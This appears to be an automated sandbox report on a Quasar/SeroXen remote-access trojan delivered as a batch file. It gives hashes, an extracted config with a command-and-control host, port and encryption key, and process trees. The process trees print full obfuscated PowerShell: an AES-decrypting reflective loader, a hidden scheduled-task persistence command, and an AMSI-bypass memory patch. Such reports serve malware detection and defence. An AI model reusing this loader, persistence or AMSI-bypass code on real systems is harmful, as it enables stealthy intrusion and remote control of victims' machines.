Analysis
max time kernel: 90s
max time network: 176s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 02-06-2024 14:38
Static task: static1
Behavioral task: behavioral1
  Sample: $sxr-Uni.bat
  Resource: win10-20240404-en
Behavioral task: behavioral2
  Sample: $sxr-Uni.bat
  Resource: win10v2004-20240426-en
Behavioral task: behavioral3
  Sample: $sxr-Uni.bat
  Resource: win11-20240508-en
General
Target: $sxr-Uni.bat
Size: 723KB
MD5: beb1362e7de769ce5332ea614d48b508
SHA1: 3b8db446968c37b66df57c21868331ae2a63d716
SHA256: 3785896edb293ff81a5d511d761602739e712118aaf8e5e78986e389eb8cbd25
SHA512: 8a52b4e50d49498288da73fe2b0ea12d67a0fadda4697b6adb6151cd65c33fddf3d4829d3fdda1dea56b65c7f5b7abe0bd20452ba40f7d3f2fcd4b8d69bc6830
SSDEEP: 12288:e8vdejMeNYAAibWDLHPZyYNnOXydab+vGrtdF6YZ4J4H1EmpyL1IuHpk8:eAdeVwDLvDNOXyd0xdz4J4H1E9L1I0
Malware Config
Extracted
Family: quasar
Version: 3.1.5
SeroXen | v3.1.5 |
runderscore00-61208.portmap.host:61208
$Sxr-jy6vh8CtEJL5ceZuIb
encryption_key: Q6KDujSVF3q2D64a3maQ
install_name: $sxr-powershell.exe
log_directory: $sxr-Logs
reconnect_delay: 3000
startup_key: Powershell
subdirectory: $sxr-seroxen2
Signatures
-
Quasar payload 1 IoCs
  resource | yara_rule
  behavioral3/memory/4480-78-0x00000000076B0000-0x000000000771C000-memory.dmp | family_quasar
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description | pid | process | target process
  PID 4628 created 636 | 4628 | powershell.EXE | winlogon.exe
-
Blocklisted process makes network request 3 IoCs
Processes:
  flow | pid | process
  2 | 4480 | powershell.exe
  3 | 4480 | powershell.exe
  4 | 4480 | powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
  pid | process
  1092 | powershell.exe
  888 | powershell.exe
  4480 | powershell.exe
-
Executes dropped EXE 2 IoCs
Processes:
  pid | process
  2912 | Install.exe
  1948 | ResetSurvival.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  1 | ip-api.com
-
Drops file in System32 directory 2 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description | pid | process | target process
  PID 4628 set thread context of 1364 | 4628 | powershell.EXE | dllhost.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 41 IoCs
-
Modifies registry class 1 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
  pid | process
  1092 | powershell.exe
  1092 | powershell.exe
  888 | powershell.exe
  888 | powershell.exe
  4480 | powershell.exe
  4480 | powershell.exe
  4628 | powershell.EXE
  4628 | powershell.EXE
  4628 | powershell.EXE
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
  pid | process
  4480 | powershell.exe
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
  description | pid | process | target process
  PID 3892 wrote to memory of 1092 | 3892 | cmd.exe | powershell.exe
  PID 3892 wrote to memory of 1092 | 3892 | cmd.exe | powershell.exe
  PID 3892 wrote to memory of 1092 | 3892 | cmd.exe | powershell.exe
  PID 1092 wrote to memory of 888 | 1092 | powershell.exe | powershell.exe
  PID 1092 wrote to memory of 888 | 1092 | powershell.exe | powershell.exe
  PID 1092 wrote to memory of 888 | 1092 | powershell.exe | powershell.exe
  PID 1092 wrote to memory of 3020 | 1092 | powershell.exe | WScript.exe
  PID 1092 wrote to memory of 3020 | 1092 | powershell.exe | WScript.exe
  PID 1092 wrote to memory of 3020 | 1092 | powershell.exe | WScript.exe
  PID 3020 wrote to memory of 1932 | 3020 | WScript.exe | cmd.exe
  PID 3020 wrote to memory of 1932 | 3020 | WScript.exe | cmd.exe
  PID 3020 wrote to memory of 1932 | 3020 | WScript.exe | cmd.exe
  PID 1932 wrote to memory of 4480 | 1932 | cmd.exe | powershell.exe
  PID 1932 wrote to memory of 4480 | 1932 | cmd.exe | powershell.exe
  PID 1932 wrote to memory of 4480 | 1932 | cmd.exe | powershell.exe
  PID 4480 wrote to memory of 2912 | 4480 | powershell.exe | Install.exe
  PID 4480 wrote to memory of 2912 | 4480 | powershell.exe | Install.exe
  PID 4480 wrote to memory of 2912 | 4480 | powershell.exe | Install.exe
  PID 4480 wrote to memory of 1948 | 4480 | powershell.exe | ResetSurvival.exe
  PID 4480 wrote to memory of 1948 | 4480 | powershell.exe | ResetSurvival.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
  PID 4628 wrote to memory of 1364 | 4628 | powershell.EXE | dllhost.exe
Processes
- C:\Windows\system32\winlogon.exe (depth 1, PID 636)
  Command line: winlogon.exe
-
- C:\Windows\System32\dllhost.exe (depth 2, PID 1364)
  Command line: C:\Windows\System32\dllhost.exe /Processid:{2ec532e8-50f2-4d2c-9dc8-de3befc93ecb}
-
- C:\Windows\system32\cmd.exe (depth 1, PID 3892)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7uctZMFx6G9ucHdptJcO83jS0zyXalW/JF9L2ribdis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNOpQvTMP1KTzAKvCLgIVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tkugM=New-Object System.IO.MemoryStream(,$param_var); $HMuDf=New-Object System.IO.MemoryStream; $ZaAiu=New-Object System.IO.Compression.GZipStream($tkugM, [IO.Compression.CompressionMode]::Decompress); $ZaAiu.CopyTo($HMuDf); $ZaAiu.Dispose(); $tkugM.Dispose(); $HMuDf.Dispose(); $HMuDf.ToArray();}function execute_function($param_var,$param2_var){ $JmmpE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lmGYr=$JmmpE.EntryPoint; $lmGYr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$VyxHM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($iulyk in $VyxHM) { if ($iulyk.StartsWith(':: ')) { $qpkVJ=$iulyk.Substring(3); break; }}$payloads_var=[string[]]$qpkVJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] (''));2⤵
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1092
-
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 888)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_534_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_534.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
- C:\Windows\SysWOW64\WScript.exe (depth 3, PID 3020)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_534.vbs"
  Signatures:
  - Suspicious use of WriteProcessMemory
-
- C:\Windows\SysWOW64\cmd.exe (depth 4, PID 1932)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_534.bat" "
  Signatures:
  - Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7uctZMFx6G9ucHdptJcO83jS0zyXalW/JF9L2ribdis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNOpQvTMP1KTzAKvCLgIVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tkugM=New-Object System.IO.MemoryStream(,$param_var); $HMuDf=New-Object System.IO.MemoryStream; $ZaAiu=New-Object System.IO.Compression.GZipStream($tkugM, [IO.Compression.CompressionMode]::Decompress); $ZaAiu.CopyTo($HMuDf); $ZaAiu.Dispose(); $tkugM.Dispose(); $HMuDf.Dispose(); $HMuDf.ToArray();}function execute_function($param_var,$param2_var){ $JmmpE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lmGYr=$JmmpE.EntryPoint; $lmGYr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_534.bat';$VyxHM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_534.bat').Split([Environment]::NewLine);foreach ($iulyk in $VyxHM) { if ($iulyk.StartsWith(':: ')) { $qpkVJ=$iulyk.Substring(3); break; }}$payloads_var=[string[]]$qpkVJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));5⤵
  Signatures:
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 4480
-
- C:\Users\Admin\AppData\Local\Temp\Install.exe (depth 6, PID 2912)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
  Signatures:
  - Executes dropped EXE
-
- C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe (depth 6, PID 1948)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"
  Signatures:
  - Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eqLhyvyQKQWM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lnUhchXbqYKxNK,[Parameter(Position=1)][Type]$bEJVjqRfPO)$AWLerbHEZMZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$AWLerbHEZMZ.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+'eB'+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lnUhchXbqYKxNK).SetImplementationFlags('Run'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$AWLerbHEZMZ.DefineMethod('In'+'v'+'oke',''+'P'+''+[Char](117)+''+[Cha
r](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'i'+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$bEJVjqRfPO,$lnUhchXbqYKxNK).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $AWLerbHEZMZ.CreateType();}$iEQIVOesdUwtJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+'3'+''+'2'+''+'.'+''+[Char](85)+'ns'+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+'t'+'h'+'o'+[Char](100)+'s');$JihsZkFosAGiri=$iEQIVOesdUwtJ.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VZBmYUsiVYJspNbztsf=eqLhyvyQKQWM @([String])([IntPtr]);$rmxeaBvRdCTsiFUehBUwkN=eqLhyvyQKQWM 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MwkSrXNhCFd=$iEQIVOesdUwtJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'el32.d'+[Char](108)+'l')));$BZPIOPGJBYfUTN=$JihsZkFosAGiri.Invoke($Null,@([Object]$MwkSrXNhCFd,[Object](''+'L'+''+[Char](111)+''+'a'+'dLib'+'r'+'a'+'r'+'y'+[Char](65)+'')));$iCNxQzqiQbTdZMeSh=$JihsZkFosAGiri.Invoke($Null,@([Object]$MwkSrXNhCFd,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'ct')));$KJqiolX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BZPIOPGJBYfUTN,$VZBmYUsiVYJspNbztsf).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$CuDzCzntjXsqEUgqY=$JihsZkFosAGiri.Invoke($Null,@([Object]$KJqiolX,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'iSc'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+'fer')));$LoycvSbptd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iCNxQzqiQbTdZMeSh,$rmxeaBvRdCTsiFUehBUwkN).Invoke($CuDzCzntjXsqEUgqY,[uint32]8,4,[ref]$LoycvSbptd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CuDzCzntjXsqEUgqY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iCNxQzqiQbTdZMeSh,$rmxeaBvRdCTsiFUehBUwkN).Invoke($CuDzCzntjXsqEUgqY,[uint32]8,0x20,[ref]$LoycvSbptd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+'7'+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"1⤵
  Signatures:
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 4628
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 8ba8fc1034d449222856ea8fa2531e28
  SHA1: 7570fe1788e57484c5138b6cead052fbc3366f3e
  SHA256: 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
  SHA512: 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 17KB
  MD5: 1ed6ae24188d4888db6643cadfaadcb6
  SHA1: 94c2152f3a737123725fec173ccc04fcdfb38e9f
  SHA256: e4a02c78045555ac6d6efa12f4bab3c2fa66ff2d051e50e94fb4889745533c58
  SHA512: 44e81f9daca5aeac0dc87dc1940f9fb58b8ae1251813584ce3708246020ad3b70281afe99660a3a9130c1dbff32bdb2c5c6a94bec7417c21f021cb60205dc7d7
-
- C:\Users\Admin\AppData\Local\Temp\Install.exe
  Filesize: 163KB
  MD5: 051b3f7c30caf2eedbed29daa6192efb
  SHA1: a3e0f31e4b4367e5af06f71e7718e7d64ceb250d
  SHA256: 6cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3
  SHA512: 93288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158
-
- C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe
  Filesize: 17KB
  MD5: 5ce6714302e7247b1cb7ac7585d75601
  SHA1: 98602182b1aebe260855f8e69e919387d37150c7
  SHA256: 321459d3f0beb05bedead51c1a31a25560e7cb0f6ccb2bb630528fe201580f55
  SHA512: 192ef57e12fe4a794cf6f5c51a97214ecdfe49d85eae8b3c6d47e51c4a84d2cdb9146292c84aaa0f71051e0e350169a967c2c87075ebd5fbbb6ba50a6bd8400e
-
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ig4gfayz.daj.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
- C:\Users\Admin\AppData\Roaming\startup_str_534.bat
  Filesize: 723KB
  MD5: beb1362e7de769ce5332ea614d48b508
  SHA1: 3b8db446968c37b66df57c21868331ae2a63d716
  SHA256: 3785896edb293ff81a5d511d761602739e712118aaf8e5e78986e389eb8cbd25
  SHA512: 8a52b4e50d49498288da73fe2b0ea12d67a0fadda4697b6adb6151cd65c33fddf3d4829d3fdda1dea56b65c7f5b7abe0bd20452ba40f7d3f2fcd4b8d69bc6830
-
- C:\Users\Admin\AppData\Roaming\startup_str_534.vbs
  Filesize: 115B
  MD5: 360bb30336a5b49226d9c4baa5013778
  SHA1: 516b6e0a304b042d7c3d33e166d4bb8236d27cbb
  SHA256: 6b903426d215de176a4e8be2ed0891f4f3933aede3c7a5cbac5abcb6b52ce4e7
  SHA512: 979716eec9d585bb23ec641f5f34df448ff674606d0aefd73bfc69571a3b3ec33b0957276668a97060ccbb01b102be514313e248c0a292740ed14b8c9b137337